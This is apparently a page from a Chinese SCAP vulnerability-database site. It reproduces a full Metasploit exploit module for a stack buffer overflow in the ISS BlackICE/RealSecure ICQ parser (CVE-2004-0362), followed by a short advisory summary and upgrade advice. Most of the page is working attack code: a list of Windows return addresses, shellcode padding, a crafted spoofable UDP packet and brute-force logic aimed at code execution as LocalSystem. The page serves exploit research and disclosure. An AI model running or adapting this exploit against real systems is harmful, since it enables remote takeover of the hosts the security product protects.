class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'ISS PAM.dll ICQ Parser Buffer Overflow',
			'Description'    => %q{
	This module exploits a stack overflow in the ISS products that use
	the iss-pam1.dll ICQ parser (Blackice/RealSecure). Successful exploitation
	will result in arbitrary code execution as LocalSystem. This exploit 
	only requires 1 UDP packet, which can be both spoofed and sent to a broadcast
	address.

   The ISS exception handler will recover the process after each overflow, giving
	us the ability to bruteforce the service and exploit it multiple times.
			},
			'Author'         => 'spoonm',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					['CVE', '2004-0362'],
					['OSVDB', '4355'],
					['URL',   'http://www.eeye.com/html/Research/Advisories/AD20040318.html'],
					['URL',   'http://xforce.iss.net/xforce/alerts/id/166'],
				],
			'Payload'        =>
				{
					'Space'           => 504 -31 -4,
					'BadChars'        => "\x00",
					'MinNops'         => 0,
					'MaxNops'         => 0,
					'StackAdjustment' => -3500
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Bruteforce',                   {  } ],
					[ 'Bruteforce iis-pam1.dll',      { 'Targets' => 3 .. 4  } ],
					[ 'Bruteforce NT 4.0',            { 'Targets' => 5 .. 15 } ],
					[ 'iis-pam1.dll 3.6.06',          { 'Ret' => 0x5e0a47ef } ], 
					[ 'iis-pam1.dll 3.6.11',          { 'Ret' => 0x5e0da1db } ], 
					[ 'WinNT SP3/SP4/SP5',            { 'Ret' => 0x777e79ab } ], 
					[ 'WinNT SP4/SP5',                { 'Ret' => 0x7733b8db } ], 
					[ 'WinNT SP5/SP6 - advapi32',     { 'Ret' => 0x77dcd1cb } ], 
					[ 'WinNT SP3/SP5/SP6 - shell32',  { 'Ret' => 0x77cec080 } ], 
					[ 'WinNT SP5/SP6 - mswsock',      { 'Ret' => 0x7767ebca } ], 
					[ 'WinXP SP0/SP1 - shell32',      { 'Ret' => 0x776606af } ], 
					[ 'WinXP SP0/SP1 - atl',          { 'Ret' => 0x76b305a7 } ], 
					[ 'WinXP SP0/SP1 - atl',          { 'Ret' => 0x76e61a21 } ], 
					[ 'WinXP SP0/SP1 - ws2_32',       { 'Ret' => 0x71ab7bfb } ], 
					[ 'WinXP SP0/SP1 - mswsock',      { 'Ret' => 0x71a5403d } ], 
					[ 'Windows 2000 Pro SP4 English', { 'Ret' => 0x7c2ec68b } ],
					[ 'Win2000 SP0 - SP4',            { 'Ret' => 0x750231e2 } ], 
					[ 'Win2000 SP2/SP3 - samlib',     { 'Ret' => 0x75159da3 } ], 
					[ 'Win2000 SP0/SP1 - activeds',   { 'Ret' => 0x77ed0beb } ], 
					[ 'Windows XP Pro SP0 English',   { 'Ret' => 0x77e3171b } ],
					[ 'Windows XP Pro SP1 English',   { 'Ret' => 0x77dc5527 } ], 
					[ 'WinXP SP0 - SP1',              { 'Ret' => 0x71aa3a4b } ], 
					[ 'Win2003 SP0',                  { 'Ret' => 0x71bf3cc9 } ], 
				],
			'DisclosureDate' => 'Mar 18 2004',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(1)
			], self.class)
	end

	def exploit
		datastore['RPORT'] = rand(65536) if rport == 1

		targs = [ target ]

		if target.name =~ /^Brute/
			if target['Targets']
				targs = []

				target['Targets'].each { |idx|
					targs << targets[idx]
				}
			else
				targs = targets.dup

				targs.delete_at(0)
				targs.delete_at(0)
				targs.delete_at(0)
			end
		end

		targs.each { |targ|
			print_status("Trying target #{targ.name} [#{"%.8x" % targ.ret}]...")

		   shellcode = payload.encoded + rand_text_english(payload_space - payload.encoded.length)
			email     = rand_text_english(19) + [targ.ret].pack('V') + shellcode

			# Hopefully this structure is correct -- ported from msf 2.  Blame me
			# (skape) if it doesn't work!
			packet    =
				# SRV_MULTI
				[5, 0, 0, 530, 0, 0, 1161044754, 0, 2].pack('vcVvvvVVc') + 
				# SRV_USER_ONLINE
				[5, 0, 0, 110, 0, 0, 1161044754, 0].pack('vcVvvvVV') +
				 [1161044754, 1, 0, 0, 0, 0, 0].pack('VVVVcVV') +
				# SRV_META_USER
				[5, 0, 0, 990, 0, 0, 2018915346, 0].pack('vcVvvvVV') +
				 "\x00\x00\x0a" + # subcommand / success
				 "\x00\x00"     + # nick length / nick
				 "\x00\x00"     + # first length / first
				 "\x00\x00"     + # last length / last
				 [email.length].pack('v') + email + 
				 "\x00\x00\x00\x00\x00\x00\x00"

			print_status("Sending UDP request to #{datastore['RPORT']} (#{packet.length} bytes)")

			connect_udp(true, { 'CPORT' => 4000 })
			udp_sock.put(packet)
			disconnect_udp

			print_status("Sleeping (giving exception handler time to recover)")

			sleep(5)
		}
	end

end
    

- 漏洞信息

4355
ISS Multiple Products PAM Component ICQ Protocol Parsing Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public, Exploit Commercial, Exploit Wormified Vendor Verified

- 漏洞描述

Internet Security Systems' Protocol Analysis Module (PAM) contains a flaw that allows a remote attacker to execute arbitrary code. The issue is due to a series of stack based buffer overflows in the module that monitors ICQ server responses. If an attacker sends a specially crafted UDP packet that originates with a source port of 4000, they may be able to execute arbitrary code.

- 时间线

2004-03-18 2004-03-08
Unknow 2004-03-18

- 解决方案

Upgrade to the latest version available on the vendor website, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站